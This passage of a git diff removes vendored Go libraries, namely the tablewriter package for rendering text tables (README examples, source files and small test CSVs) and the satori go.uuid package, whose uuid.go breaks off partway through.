Markdown Format -```go -data := [][]string{ - []string{"1/1/2014", "Domain name", "2233", "$10.98"}, - []string{"1/1/2014", "January Hosting", "2233", "$54.95"}, - []string{"1/4/2014", "February Hosting", "2233", "$51.00"}, - []string{"1/4/2014", "February Extra Bandwidth", "2233", "$30.00"}, -} - -table := tablewriter.NewWriter(os.Stdout) -table.SetHeader([]string{"Date", "Description", "CV2", "Amount"}) -table.SetBorders(tablewriter.Border{Left: true, Top: false, Right: true, Bottom: false}) -table.SetCenterSeparator("|") -table.AppendBulk(data) // Add Bulk Data -table.Render() -``` - -##### Output 5 -``` -| DATE | DESCRIPTION | CV2 | AMOUNT | -|----------|--------------------------|------|--------| -| 1/1/2014 | Domain name | 2233 | $10.98 | -| 1/1/2014 | January Hosting | 2233 | $54.95 | -| 1/4/2014 | February Hosting | 2233 | $51.00 | -| 1/4/2014 | February Extra Bandwidth | 2233 | $30.00 | -``` - -#### Example 6 - Identical cells merging -```go -data := [][]string{ - []string{"1/1/2014", "Domain name", "1234", "$10.98"}, - []string{"1/1/2014", "January Hosting", "2345", "$54.95"}, - []string{"1/4/2014", "February Hosting", "3456", "$51.00"}, - []string{"1/4/2014", "February Extra Bandwidth", "4567", "$30.00"}, -} - -table := tablewriter.NewWriter(os.Stdout) -table.SetHeader([]string{"Date", "Description", "CV2", "Amount"}) -table.SetFooter([]string{"", "", "Total", "$146.93"}) -table.SetAutoMergeCells(true) -table.SetRowLine(true) -table.AppendBulk(data) -table.Render() -``` - -##### Output 6 -``` -+----------+--------------------------+-------+---------+ -| DATE | DESCRIPTION | CV2 | AMOUNT | -+----------+--------------------------+-------+---------+ -| 1/1/2014 | Domain name | 1234 | $10.98 | -+ +--------------------------+-------+---------+ -| | January Hosting | 2345 | $54.95 | -+----------+--------------------------+-------+---------+ -| 1/4/2014 | February Hosting | 3456 | $51.00 | -+ +--------------------------+-------+---------+ -| | February Extra Bandwidth | 4567 | $30.00 | -+----------+--------------------------+-------+---------+ -| TOTAL | $146 93 | -+----------+--------------------------+-------+---------+ -``` - -#### TODO -- ~~Import Directly from CSV~~ - `done` -- ~~Support for `SetFooter`~~ - `done` -- ~~Support for `SetBorder`~~ - `done` -- ~~Support table with uneven rows~~ - `done` -- Support custom alignment -- General Improvement & Optimisation -- `NewHTML` Parse table from HTML diff --git a/vendor/github.com/olekukonko/tablewriter/csv.go b/vendor/github.com/olekukonko/tablewriter/csv.go deleted file mode 100644 index 98878303..00000000 --- a/vendor/github.com/olekukonko/tablewriter/csv.go +++ /dev/null @@ -1,52 +0,0 @@ -// Copyright 2014 Oleku Konko All rights reserved. -// Use of this source code is governed by a MIT -// license that can be found in the LICENSE file. - -// This module is a Table Writer API for the Go Programming Language. 
-// The protocols were written in pure Go and works on windows and unix systems - -package tablewriter - -import ( - "encoding/csv" - "io" - "os" -) - -// Start A new table by importing from a CSV file -// Takes io.Writer and csv File name -func NewCSV(writer io.Writer, fileName string, hasHeader bool) (*Table, error) { - file, err := os.Open(fileName) - if err != nil { - return &Table{}, err - } - defer file.Close() - csvReader := csv.NewReader(file) - t, err := NewCSVReader(writer, csvReader, hasHeader) - return t, err -} - -// Start a New Table Writer with csv.Reader -// This enables customisation such as reader.Comma = ';' -// See http://golang.org/src/pkg/encoding/csv/reader.go?s=3213:3671#L94 -func NewCSVReader(writer io.Writer, csvReader *csv.Reader, hasHeader bool) (*Table, error) { - t := NewWriter(writer) - if hasHeader { - // Read the first row - headers, err := csvReader.Read() - if err != nil { - return &Table{}, err - } - t.SetHeader(headers) - } - for { - record, err := csvReader.Read() - if err == io.EOF { - break - } else if err != nil { - return &Table{}, err - } - t.Append(record) - } - return t, nil -} diff --git a/vendor/github.com/olekukonko/tablewriter/table.go b/vendor/github.com/olekukonko/tablewriter/table.go deleted file mode 100644 index 3314bfba..00000000 --- a/vendor/github.com/olekukonko/tablewriter/table.go +++ /dev/null @@ -1,662 +0,0 @@ -// Copyright 2014 Oleku Konko All rights reserved. -// Use of this source code is governed by a MIT -// license that can be found in the LICENSE file. - -// This module is a Table Writer API for the Go Programming Language. -// The protocols were written in pure Go and works on windows and unix systems - -// Create & Generate text based table -package tablewriter - -import ( - "bytes" - "fmt" - "io" - "regexp" - "strings" -) - -const ( - MAX_ROW_WIDTH = 30 -) - -const ( - CENTER = "+" - ROW = "-" - COLUMN = "|" - SPACE = " " - NEWLINE = "\n" -) - -const ( - ALIGN_DEFAULT = iota - ALIGN_CENTER - ALIGN_RIGHT - ALIGN_LEFT -) - -var ( - decimal = regexp.MustCompile(`^-*\d*\.?\d*$`) - percent = regexp.MustCompile(`^-*\d*\.?\d*$%$`) -) - -type Border struct { - Left bool - Right bool - Top bool - Bottom bool -} - -type Table struct { - out io.Writer - rows [][]string - lines [][][]string - cs map[int]int - rs map[int]int - headers []string - footers []string - autoFmt bool - autoWrap bool - mW int - pCenter string - pRow string - pColumn string - tColumn int - tRow int - hAlign int - fAlign int - align int - newLine string - rowLine bool - autoMergeCells bool - hdrLine bool - borders Border - colSize int -} - -// Start New Table -// Take io.Writer Directly -func NewWriter(writer io.Writer) *Table { - t := &Table{ - out: writer, - rows: [][]string{}, - lines: [][][]string{}, - cs: make(map[int]int), - rs: make(map[int]int), - headers: []string{}, - footers: []string{}, - autoFmt: true, - autoWrap: true, - mW: MAX_ROW_WIDTH, - pCenter: CENTER, - pRow: ROW, - pColumn: COLUMN, - tColumn: -1, - tRow: -1, - hAlign: ALIGN_DEFAULT, - fAlign: ALIGN_DEFAULT, - align: ALIGN_DEFAULT, - newLine: NEWLINE, - rowLine: false, - hdrLine: true, - borders: Border{Left: true, Right: true, Bottom: true, Top: true}, - colSize: -1} - return t -} - -// Render table output -func (t Table) Render() { - if t.borders.Top { - t.printLine(true) - } - t.printHeading() - if t.autoMergeCells { - t.printRowsMergeCells() - } else { - t.printRows() - } - - if !t.rowLine && t.borders.Bottom { - t.printLine(true) - } - t.printFooter() - -} - -// Set table header 
-func (t *Table) SetHeader(keys []string) { - t.colSize = len(keys) - for i, v := range keys { - t.parseDimension(v, i, -1) - t.headers = append(t.headers, v) - } -} - -// Set table Footer -func (t *Table) SetFooter(keys []string) { - //t.colSize = len(keys) - for i, v := range keys { - t.parseDimension(v, i, -1) - t.footers = append(t.footers, v) - } -} - -// Turn header autoformatting on/off. Default is on (true). -func (t *Table) SetAutoFormatHeaders(auto bool) { - t.autoFmt = auto -} - -// Turn automatic multiline text adjustment on/off. Default is on (true). -func (t *Table) SetAutoWrapText(auto bool) { - t.autoWrap = auto -} - -// Set the Default column width -func (t *Table) SetColWidth(width int) { - t.mW = width -} - -// Set the Column Separator -func (t *Table) SetColumnSeparator(sep string) { - t.pColumn = sep -} - -// Set the Row Separator -func (t *Table) SetRowSeparator(sep string) { - t.pRow = sep -} - -// Set the center Separator -func (t *Table) SetCenterSeparator(sep string) { - t.pCenter = sep -} - -// Set Header Alignment -func (t *Table) SetHeaderAlignment(hAlign int) { - t.hAlign = hAlign -} - -// Set Footer Alignment -func (t *Table) SetFooterAlignment(fAlign int) { - t.fAlign = fAlign -} - -// Set Table Alignment -func (t *Table) SetAlignment(align int) { - t.align = align -} - -// Set New Line -func (t *Table) SetNewLine(nl string) { - t.newLine = nl -} - -// Set Header Line -// This would enable / disable a line after the header -func (t *Table) SetHeaderLine(line bool) { - t.hdrLine = line -} - -// Set Row Line -// This would enable / disable a line on each row of the table -func (t *Table) SetRowLine(line bool) { - t.rowLine = line -} - -// Set Auto Merge Cells -// This would enable / disable the merge of cells with identical values -func (t *Table) SetAutoMergeCells(auto bool) { - t.autoMergeCells = auto -} - -// Set Table Border -// This would enable / disable line around the table -func (t *Table) SetBorder(border bool) { - t.SetBorders(Border{border, border, border, border}) -} - -func (t *Table) SetBorders(border Border) { - t.borders = border -} - -// Append row to table -func (t *Table) Append(row []string) { - rowSize := len(t.headers) - if rowSize > t.colSize { - t.colSize = rowSize - } - - n := len(t.lines) - line := [][]string{} - for i, v := range row { - - // Detect string width - // Detect String height - // Break strings into words - out := t.parseDimension(v, i, n) - - // Append broken words - line = append(line, out) - } - t.lines = append(t.lines, line) -} - -// Allow Support for Bulk Append -// Eliminates repeated for loops -func (t *Table) AppendBulk(rows [][]string) { - for _, row := range rows { - t.Append(row) - } -} - -// Print line based on row width -func (t Table) printLine(nl bool) { - fmt.Fprint(t.out, t.pCenter) - for i := 0; i < len(t.cs); i++ { - v := t.cs[i] - fmt.Fprintf(t.out, "%s%s%s%s", - t.pRow, - strings.Repeat(string(t.pRow), v), - t.pRow, - t.pCenter) - } - if nl { - fmt.Fprint(t.out, t.newLine) - } -} - -// Print line based on row width with our without cell separator -func (t Table) printLineOptionalCellSeparators(nl bool, displayCellSeparator []bool) { - fmt.Fprint(t.out, t.pCenter) - for i := 0; i < len(t.cs); i++ { - v := t.cs[i] - if i > len(displayCellSeparator) || displayCellSeparator[i] { - // Display the cell separator - fmt.Fprintf(t.out, "%s%s%s%s", - t.pRow, - strings.Repeat(string(t.pRow), v), - t.pRow, - t.pCenter) - } else { - // Don't display the cell separator for this cell - fmt.Fprintf(t.out, "%s%s", - 
strings.Repeat(" ", v+2), - t.pCenter) - } - } - if nl { - fmt.Fprint(t.out, t.newLine) - } -} - -// Return the PadRight function if align is left, PadLeft if align is right, -// and Pad by default -func pad(align int) func(string, string, int) string { - padFunc := Pad - switch align { - case ALIGN_LEFT: - padFunc = PadRight - case ALIGN_RIGHT: - padFunc = PadLeft - } - return padFunc -} - -// Print heading information -func (t Table) printHeading() { - // Check if headers is available - if len(t.headers) < 1 { - return - } - - // Check if border is set - // Replace with space if not set - fmt.Fprint(t.out, ConditionString(t.borders.Left, t.pColumn, SPACE)) - - // Identify last column - end := len(t.cs) - 1 - - // Get pad function - padFunc := pad(t.hAlign) - - // Print Heading column - for i := 0; i <= end; i++ { - v := t.cs[i] - h := t.headers[i] - if t.autoFmt { - h = Title(h) - } - pad := ConditionString((i == end && !t.borders.Left), SPACE, t.pColumn) - fmt.Fprintf(t.out, " %s %s", - padFunc(h, SPACE, v), - pad) - } - // Next line - fmt.Fprint(t.out, t.newLine) - if t.hdrLine { - t.printLine(true) - } -} - -// Print heading information -func (t Table) printFooter() { - // Check if headers is available - if len(t.footers) < 1 { - return - } - - // Only print line if border is not set - if !t.borders.Bottom { - t.printLine(true) - } - // Check if border is set - // Replace with space if not set - fmt.Fprint(t.out, ConditionString(t.borders.Bottom, t.pColumn, SPACE)) - - // Identify last column - end := len(t.cs) - 1 - - // Get pad function - padFunc := pad(t.fAlign) - - // Print Heading column - for i := 0; i <= end; i++ { - v := t.cs[i] - f := t.footers[i] - if t.autoFmt { - f = Title(f) - } - pad := ConditionString((i == end && !t.borders.Top), SPACE, t.pColumn) - - if len(t.footers[i]) == 0 { - pad = SPACE - } - fmt.Fprintf(t.out, " %s %s", - padFunc(f, SPACE, v), - pad) - } - // Next line - fmt.Fprint(t.out, t.newLine) - //t.printLine(true) - - hasPrinted := false - - for i := 0; i <= end; i++ { - v := t.cs[i] - pad := t.pRow - center := t.pCenter - length := len(t.footers[i]) - - if length > 0 { - hasPrinted = true - } - - // Set center to be space if length is 0 - if length == 0 && !t.borders.Right { - center = SPACE - } - - // Print first junction - if i == 0 { - fmt.Fprint(t.out, center) - } - - // Pad With space of length is 0 - if length == 0 { - pad = SPACE - } - // Ignore left space of it has printed before - if hasPrinted || t.borders.Left { - pad = t.pRow - center = t.pCenter - } - - // Change Center start position - if center == SPACE { - if i < end && len(t.footers[i+1]) != 0 { - center = t.pCenter - } - } - - // Print the footer - fmt.Fprintf(t.out, "%s%s%s%s", - pad, - strings.Repeat(string(pad), v), - pad, - center) - - } - - fmt.Fprint(t.out, t.newLine) - -} - -func (t Table) printRows() { - for i, lines := range t.lines { - t.printRow(lines, i) - } - -} - -// Print Row Information -// Adjust column alignment based on type - -func (t Table) printRow(columns [][]string, colKey int) { - // Get Maximum Height - max := t.rs[colKey] - total := len(columns) - - // TODO Fix uneven col size - // if total < t.colSize { - // for n := t.colSize - total; n < t.colSize ; n++ { - // columns = append(columns, []string{SPACE}) - // t.cs[n] = t.mW - // } - //} - - // Pad Each Height - // pads := []int{} - pads := []int{} - - for i, line := range columns { - length := len(line) - pad := max - length - pads = append(pads, pad) - for n := 0; n < pad; n++ { - columns[i] = 
append(columns[i], " ") - } - } - //fmt.Println(max, "\n") - for x := 0; x < max; x++ { - for y := 0; y < total; y++ { - - // Check if border is set - fmt.Fprint(t.out, ConditionString((!t.borders.Left && y == 0), SPACE, t.pColumn)) - - fmt.Fprintf(t.out, SPACE) - str := columns[y][x] - - // This would print alignment - // Default alignment would use multiple configuration - switch t.align { - case ALIGN_CENTER: // - fmt.Fprintf(t.out, "%s", Pad(str, SPACE, t.cs[y])) - case ALIGN_RIGHT: - fmt.Fprintf(t.out, "%s", PadLeft(str, SPACE, t.cs[y])) - case ALIGN_LEFT: - fmt.Fprintf(t.out, "%s", PadRight(str, SPACE, t.cs[y])) - default: - if decimal.MatchString(strings.TrimSpace(str)) || percent.MatchString(strings.TrimSpace(str)) { - fmt.Fprintf(t.out, "%s", PadLeft(str, SPACE, t.cs[y])) - } else { - fmt.Fprintf(t.out, "%s", PadRight(str, SPACE, t.cs[y])) - - // TODO Custom alignment per column - //if max == 1 || pads[y] > 0 { - // fmt.Fprintf(t.out, "%s", Pad(str, SPACE, t.cs[y])) - //} else { - // fmt.Fprintf(t.out, "%s", PadRight(str, SPACE, t.cs[y])) - //} - - } - } - fmt.Fprintf(t.out, SPACE) - } - // Check if border is set - // Replace with space if not set - fmt.Fprint(t.out, ConditionString(t.borders.Left, t.pColumn, SPACE)) - fmt.Fprint(t.out, t.newLine) - } - - if t.rowLine { - t.printLine(true) - } -} - -// Print the rows of the table and merge the cells that are identical -func (t Table) printRowsMergeCells() { - var previousLine []string - var displayCellBorder []bool - var tmpWriter bytes.Buffer - for i, lines := range t.lines { - // We store the display of the current line in a tmp writer, as we need to know which border needs to be print above - previousLine, displayCellBorder = t.printRowMergeCells(&tmpWriter, lines, i, previousLine) - if i > 0 { //We don't need to print borders above first line - if t.rowLine { - t.printLineOptionalCellSeparators(true, displayCellBorder) - } - } - tmpWriter.WriteTo(t.out) - } - //Print the end of the table - if t.rowLine { - t.printLine(true) - } -} - -// Print Row Information to a writer and merge identical cells. -// Adjust column alignment based on type - -func (t Table) printRowMergeCells(writer io.Writer, columns [][]string, colKey int, previousLine []string) ([]string, []bool) { - // Get Maximum Height - max := t.rs[colKey] - total := len(columns) - - // Pad Each Height - pads := []int{} - - for i, line := range columns { - length := len(line) - pad := max - length - pads = append(pads, pad) - for n := 0; n < pad; n++ { - columns[i] = append(columns[i], " ") - } - } - - var displayCellBorder []bool - for x := 0; x < max; x++ { - for y := 0; y < total; y++ { - - // Check if border is set - fmt.Fprint(writer, ConditionString((!t.borders.Left && y == 0), SPACE, t.pColumn)) - - fmt.Fprintf(writer, SPACE) - - str := columns[y][x] - - if t.autoMergeCells { - //Store the full line to merge mutli-lines cells - fullLine := strings.Join(columns[y], " ") - if len(previousLine) > y && fullLine == previousLine[y] && fullLine != "" { - // If this cell is identical to the one above but not empty, we don't display the border and keep the cell empty. 
- displayCellBorder = append(displayCellBorder, false) - str = "" - } else { - // First line or different content, keep the content and print the cell border - displayCellBorder = append(displayCellBorder, true) - } - } - - // This would print alignment - // Default alignment would use multiple configuration - switch t.align { - case ALIGN_CENTER: // - fmt.Fprintf(writer, "%s", Pad(str, SPACE, t.cs[y])) - case ALIGN_RIGHT: - fmt.Fprintf(writer, "%s", PadLeft(str, SPACE, t.cs[y])) - case ALIGN_LEFT: - fmt.Fprintf(writer, "%s", PadRight(str, SPACE, t.cs[y])) - default: - if decimal.MatchString(strings.TrimSpace(str)) || percent.MatchString(strings.TrimSpace(str)) { - fmt.Fprintf(writer, "%s", PadLeft(str, SPACE, t.cs[y])) - } else { - fmt.Fprintf(writer, "%s", PadRight(str, SPACE, t.cs[y])) - } - } - fmt.Fprintf(writer, SPACE) - } - // Check if border is set - // Replace with space if not set - fmt.Fprint(writer, ConditionString(t.borders.Left, t.pColumn, SPACE)) - fmt.Fprint(writer, t.newLine) - } - - //The new previous line is the current one - previousLine = make([]string, total) - for y := 0; y < total; y++ { - previousLine[y] = strings.Join(columns[y], " ") //Store the full line for multi-lines cells - } - //Returns the newly added line and wether or not a border should be displayed above. - return previousLine, displayCellBorder -} - -func (t *Table) parseDimension(str string, colKey, rowKey int) []string { - var ( - raw []string - max int - ) - w := DisplayWidth(str) - // Calculate Width - // Check if with is grater than maximum width - if w > t.mW { - w = t.mW - } - - // Check if width exists - v, ok := t.cs[colKey] - if !ok || v < w || v == 0 { - t.cs[colKey] = w - } - - if rowKey == -1 { - return raw - } - // Calculate Height - if t.autoWrap { - raw, _ = WrapString(str, t.cs[colKey]) - } else { - raw = getLines(str) - } - - for _, line := range raw { - if w := DisplayWidth(line); w > max { - max = w - } - } - - // Make sure the with is the same length as maximum word - // Important for cases where the width is smaller than maxu word - if max > t.cs[colKey] { - t.cs[colKey] = max - } - - h := len(raw) - v, ok = t.rs[rowKey] - - if !ok || v < h || v == 0 { - t.rs[rowKey] = h - } - //fmt.Printf("Raw %+v %d\n", raw, len(raw)) - return raw -} diff --git a/vendor/github.com/olekukonko/tablewriter/test.csv b/vendor/github.com/olekukonko/tablewriter/test.csv deleted file mode 100644 index 1609327e..00000000 --- a/vendor/github.com/olekukonko/tablewriter/test.csv +++ /dev/null @@ -1,4 +0,0 @@ -first_name,last_name,ssn -John,Barry,123456 -Kathy,Smith,687987 -Bob,McCornick,3979870 \ No newline at end of file diff --git a/vendor/github.com/olekukonko/tablewriter/test_info.csv b/vendor/github.com/olekukonko/tablewriter/test_info.csv deleted file mode 100644 index e4c40e98..00000000 --- a/vendor/github.com/olekukonko/tablewriter/test_info.csv +++ /dev/null @@ -1,4 +0,0 @@ -Field,Type,Null,Key,Default,Extra -user_id,smallint(5),NO,PRI,NULL,auto_increment -username,varchar(10),NO,,NULL, -password,varchar(100),NO,,NULL, \ No newline at end of file diff --git a/vendor/github.com/olekukonko/tablewriter/util.go b/vendor/github.com/olekukonko/tablewriter/util.go deleted file mode 100644 index 2deefbc5..00000000 --- a/vendor/github.com/olekukonko/tablewriter/util.go +++ /dev/null @@ -1,72 +0,0 @@ -// Copyright 2014 Oleku Konko All rights reserved. -// Use of this source code is governed by a MIT -// license that can be found in the LICENSE file. 
-
-// This module is a Table Writer API for the Go Programming Language.
-// The protocols were written in pure Go and works on windows and unix systems
-
-package tablewriter
-
-import (
-	"math"
-	"regexp"
-	"strings"
-
-	"github.com/mattn/go-runewidth"
-)
-
-var ansi = regexp.MustCompile("\033\\[(?:[0-9]{1,3}(?:;[0-9]{1,3})*)?[m|K]")
-
-func DisplayWidth(str string) int {
-	return runewidth.StringWidth(ansi.ReplaceAllLiteralString(str, ""))
-}
-
-// Simple Condition for string
-// Returns value based on condition
-func ConditionString(cond bool, valid, inValid string) string {
-	if cond {
-		return valid
-	}
-	return inValid
-}
-
-// Format Table Header
-// Replace _ , . and spaces
-func Title(name string) string {
-	name = strings.Replace(name, "_", " ", -1)
-	name = strings.Replace(name, ".", " ", -1)
-	name = strings.TrimSpace(name)
-	return strings.ToUpper(name)
-}
-
-// Pad String
-// Attempts to play string in the center
-func Pad(s, pad string, width int) string {
-	gap := width - DisplayWidth(s)
-	if gap > 0 {
-		gapLeft := int(math.Ceil(float64(gap / 2)))
-		gapRight := gap - gapLeft
-		return strings.Repeat(string(pad), gapLeft) + s + strings.Repeat(string(pad), gapRight)
-	}
-	return s
-}
-
-// Pad String Right position
-// This would pace string at the left side fo the screen
-func PadRight(s, pad string, width int) string {
-	gap := width - DisplayWidth(s)
-	if gap > 0 {
-		return s + strings.Repeat(string(pad), gap)
-	}
-	return s
-}
-
-// Pad String Left position
-// This would pace string at the right side fo the screen
-func PadLeft(s, pad string, width int) string {
-	gap := width - DisplayWidth(s)
-	if gap > 0 {
-		return strings.Repeat(string(pad), gap) + s
-	}
-	return s
-}
diff --git a/vendor/github.com/olekukonko/tablewriter/wrap.go b/vendor/github.com/olekukonko/tablewriter/wrap.go
deleted file mode 100644
index 5290fb65..00000000
--- a/vendor/github.com/olekukonko/tablewriter/wrap.go
+++ /dev/null
@@ -1,103 +0,0 @@
-// Copyright 2014 Oleku Konko All rights reserved.
-// Use of this source code is governed by a MIT
-// license that can be found in the LICENSE file.
-
-// This module is a Table Writer API for the Go Programming Language.
-// The protocols were written in pure Go and works on windows and unix systems
-
-package tablewriter
-
-import (
-	"math"
-	"strings"
-	"unicode/utf8"
-)
-
-var (
-	nl = "\n"
-	sp = " "
-)
-
-const defaultPenalty = 1e5
-
-// Wrap wraps s into a paragraph of lines of length lim, with minimal
-// raggedness.
-func WrapString(s string, lim int) ([]string, int) {
-	words := strings.Split(strings.Replace(s, nl, sp, -1), sp)
-	var lines []string
-	max := 0
-	for _, v := range words {
-		max = len(v)
-		if max > lim {
-			lim = max
-		}
-	}
-	for _, line := range WrapWords(words, 1, lim, defaultPenalty) {
-		lines = append(lines, strings.Join(line, sp))
-	}
-	return lines, lim
-}
-
-// WrapWords is the low-level line-breaking algorithm, useful if you need more
-// control over the details of the text wrapping process. For most uses,
-// WrapString will be sufficient and more convenient.
-//
-// WrapWords splits a list of words into lines with minimal "raggedness",
-// treating each rune as one unit, accounting for spc units between adjacent
-// words on each line, and attempting to limit lines to lim units. Raggedness
-// is the total error over all lines, where error is the square of the
-// difference of the length of the line and lim. Too-long lines (which only
-// happen when a single word is longer than lim units) have pen penalty units
-// added to the error.
-func WrapWords(words []string, spc, lim, pen int) [][]string {
-	n := len(words)
-
-	length := make([][]int, n)
-	for i := 0; i < n; i++ {
-		length[i] = make([]int, n)
-		length[i][i] = utf8.RuneCountInString(words[i])
-		for j := i + 1; j < n; j++ {
-			length[i][j] = length[i][j-1] + spc + utf8.RuneCountInString(words[j])
-		}
-	}
-	nbrk := make([]int, n)
-	cost := make([]int, n)
-	for i := range cost {
-		cost[i] = math.MaxInt32
-	}
-	for i := n - 1; i >= 0; i-- {
-		if length[i][n-1] <= lim {
-			cost[i] = 0
-			nbrk[i] = n
-		} else {
-			for j := i + 1; j < n; j++ {
-				d := lim - length[i][j-1]
-				c := d*d + cost[j]
-				if length[i][j-1] > lim {
-					c += pen // too-long lines get a worse penalty
-				}
-				if c < cost[i] {
-					cost[i] = c
-					nbrk[i] = j
-				}
-			}
-		}
-	}
-	var lines [][]string
-	i := 0
-	for i < n {
-		lines = append(lines, words[i:nbrk[i]])
-		i = nbrk[i]
-	}
-	return lines
-}
-
-// getLines decomposes a multiline string into a slice of strings.
-func getLines(s string) []string {
-	var lines []string
-
-	for _, line := range strings.Split(s, nl) {
-		lines = append(lines, line)
-	}
-	return lines
-}
diff --git a/vendor/github.com/satori/go.uuid/LICENSE b/vendor/github.com/satori/go.uuid/LICENSE
deleted file mode 100644
index 488357b8..00000000
--- a/vendor/github.com/satori/go.uuid/LICENSE
+++ /dev/null
@@ -1,20 +0,0 @@
-Copyright (C) 2013-2016 by Maxim Bublis
-
-Permission is hereby granted, free of charge, to any person obtaining
-a copy of this software and associated documentation files (the
-"Software"), to deal in the Software without restriction, including
-without limitation the rights to use, copy, modify, merge, publish,
-distribute, sublicense, and/or sell copies of the Software, and to
-permit persons to whom the Software is furnished to do so, subject to
-the following conditions:
-
-The above copyright notice and this permission notice shall be
-included in all copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
-EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
-NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
-LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
-OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
-WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
diff --git a/vendor/github.com/satori/go.uuid/README.md b/vendor/github.com/satori/go.uuid/README.md
deleted file mode 100644
index b6aad1c8..00000000
--- a/vendor/github.com/satori/go.uuid/README.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# UUID package for Go language
-
-[![Build Status](https://travis-ci.org/satori/go.uuid.png?branch=master)](https://travis-ci.org/satori/go.uuid)
-[![Coverage Status](https://coveralls.io/repos/github/satori/go.uuid/badge.svg?branch=master)](https://coveralls.io/github/satori/go.uuid)
-[![GoDoc](http://godoc.org/github.com/satori/go.uuid?status.png)](http://godoc.org/github.com/satori/go.uuid)
-
-This package provides pure Go implementation of Universally Unique Identifier (UUID). Supported both creation and parsing of UUIDs.
-
-With 100% test coverage and benchmarks out of box.
- -Supported versions: -* Version 1, based on timestamp and MAC address (RFC 4122) -* Version 2, based on timestamp, MAC address and POSIX UID/GID (DCE 1.1) -* Version 3, based on MD5 hashing (RFC 4122) -* Version 4, based on random numbers (RFC 4122) -* Version 5, based on SHA-1 hashing (RFC 4122) - -## Installation - -Use the `go` command: - - $ go get github.com/satori/go.uuid - -## Requirements - -UUID package requires Go >= 1.2. - -## Example - -```go -package main - -import ( - "fmt" - "github.com/satori/go.uuid" -) - -func main() { - // Creating UUID Version 4 - u1 := uuid.NewV4() - fmt.Printf("UUIDv4: %s\n", u1) - - // Parsing UUID from string input - u2, err := uuid.FromString("6ba7b810-9dad-11d1-80b4-00c04fd430c8") - if err != nil { - fmt.Printf("Something gone wrong: %s", err) - } - fmt.Printf("Successfully parsed: %s", u2) -} -``` - -## Documentation - -[Documentation](http://godoc.org/github.com/satori/go.uuid) is hosted at GoDoc project. - -## Links -* [RFC 4122](http://tools.ietf.org/html/rfc4122) -* [DCE 1.1: Authentication and Security Services](http://pubs.opengroup.org/onlinepubs/9696989899/chap5.htm#tagcjh_08_02_01_01) - -## Copyright - -Copyright (C) 2013-2016 by Maxim Bublis . - -UUID package released under MIT License. -See [LICENSE](https://github.com/satori/go.uuid/blob/master/LICENSE) for details. diff --git a/vendor/github.com/satori/go.uuid/uuid.go b/vendor/github.com/satori/go.uuid/uuid.go deleted file mode 100644 index 295f3fc2..00000000 --- a/vendor/github.com/satori/go.uuid/uuid.go +++ /dev/null @@ -1,481 +0,0 @@ -// Copyright (C) 2013-2015 by Maxim Bublis -// -// Permission is hereby granted, free of charge, to any person obtaining -// a copy of this software and associated documentation files (the -// "Software"), to deal in the Software without restriction, including -// without limitation the rights to use, copy, modify, merge, publish, -// distribute, sublicense, and/or sell copies of the Software, and to -// permit persons to whom the Software is furnished to do so, subject to -// the following conditions: -// -// The above copyright notice and this permission notice shall be -// included in all copies or substantial portions of the Software. -// -// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, -// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND -// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE -// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION -// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION -// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -// Package uuid provides implementation of Universally Unique Identifier (UUID). -// Supported versions are 1, 3, 4 and 5 (as specified in RFC 4122) and -// version 2 (as specified in DCE 1.1). -package uuid - -import ( - "bytes" - "crypto/md5" - "crypto/rand" - "crypto/sha1" - "database/sql/driver" - "encoding/binary" - "encoding/hex" - "fmt" - "hash" - "net" - "os" - "sync" - "time" -) - -// UUID layout variants. -const ( - VariantNCS = iota - VariantRFC4122 - VariantMicrosoft - VariantFuture -) - -// UUID DCE domains. -const ( - DomainPerson = iota - DomainGroup - DomainOrg -) - -// Difference in 100-nanosecond intervals between -// UUID epoch (October 15, 1582) and Unix epoch (January 1, 1970). -const epochStart = 122192928000000000 - -// Used in string method conversion -const dash byte = '-' - -// UUID v1/v2 storage. 
-var ( - storageMutex sync.Mutex - storageOnce sync.Once - epochFunc = unixTimeFunc - clockSequence uint16 - lastTime uint64 - hardwareAddr [6]byte - posixUID = uint32(os.Getuid()) - posixGID = uint32(os.Getgid()) -) - -// String parse helpers. -var ( - urnPrefix = []byte("urn:uuid:") - byteGroups = []int{8, 4, 4, 4, 12} -) - -func initClockSequence() { - buf := make([]byte, 2) - safeRandom(buf) - clockSequence = binary.BigEndian.Uint16(buf) -} - -func initHardwareAddr() { - interfaces, err := net.Interfaces() - if err == nil { - for _, iface := range interfaces { - if len(iface.HardwareAddr) >= 6 { - copy(hardwareAddr[:], iface.HardwareAddr) - return - } - } - } - - // Initialize hardwareAddr randomly in case - // of real network interfaces absence - safeRandom(hardwareAddr[:]) - - // Set multicast bit as recommended in RFC 4122 - hardwareAddr[0] |= 0x01 -} - -func initStorage() { - initClockSequence() - initHardwareAddr() -} - -func safeRandom(dest []byte) { - if _, err := rand.Read(dest); err != nil { - panic(err) - } -} - -// Returns difference in 100-nanosecond intervals between -// UUID epoch (October 15, 1582) and current time. -// This is default epoch calculation function. -func unixTimeFunc() uint64 { - return epochStart + uint64(time.Now().UnixNano()/100) -} - -// UUID representation compliant with specification -// described in RFC 4122. -type UUID [16]byte - -// NullUUID can be used with the standard sql package to represent a -// UUID value that can be NULL in the database -type NullUUID struct { - UUID UUID - Valid bool -} - -// The nil UUID is special form of UUID that is specified to have all -// 128 bits set to zero. -var Nil = UUID{} - -// Predefined namespace UUIDs. -var ( - NamespaceDNS, _ = 